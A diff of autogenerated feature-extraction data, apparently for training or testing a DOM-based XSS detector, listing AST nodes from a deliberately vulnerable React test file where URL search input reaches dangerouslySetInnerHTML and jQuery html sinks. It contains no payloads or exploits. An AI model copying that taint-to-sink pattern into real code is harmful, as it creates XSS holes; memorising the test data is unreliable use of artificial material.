C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:18:206:25 | setState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:18:206:25 | setState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:26 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:26 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:26 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:26 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:26 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | 'arguments' object of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | 'arguments' object of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | 'arguments' object of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | () => ( ... nted }) | CalleeFlexibleAccessPath | this.setState | | autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | () => ( ... nted }) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | () => ( ... nted }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16888,6 +116875,201 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | () => ( ... nted }) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | () => ( ... nted }) | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | () => ( ... nted }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | exceptional return of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | exceptional return of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | exceptional return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | return of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | return of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:27:206:55 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:33:206:55 | ({ tain ... nted }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:33:206:55 | ({ tain ... nted }) | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:33:206:55 | ({ tain ... nted }) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:33:206:55 | ({ tain ... nted }) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:33:206:55 | ({ tain ... nted }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:34:206:54 | { taint ... inted } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:34:206:54 | { taint ... inted } | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:34:206:54 | { taint ... inted } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:34:206:54 | { taint ... inted } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:34:206:54 | { taint ... inted } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:43 | tainted2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:43 | tainted2 | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:43 | tainted2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:43 | tainted2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:43 | tainted2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:36:206:52 | tainted2: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:46:206:52 | tainted | assignedToPropName | tainted2 | +| autogenerated/Xss/DomBasedXss/tst.js:206:46:206:52 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:46:206:52 | tainted | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:46:206:52 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:46:206:52 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:46:206:52 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:22 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:22 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:22 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:22 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:22 | this.state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:46 | this.st ... inted } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:46 | this.st ... inted } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:46 | this.st ... inted } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:46 | this.st ... inted } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:13:207:46 | this.st ... inted } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:18:207:22 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:18:207:22 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:18:207:22 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:18:207:22 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:18:207:22 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:26:207:46 | { taint ... inted } | assignedToPropName | state | +| 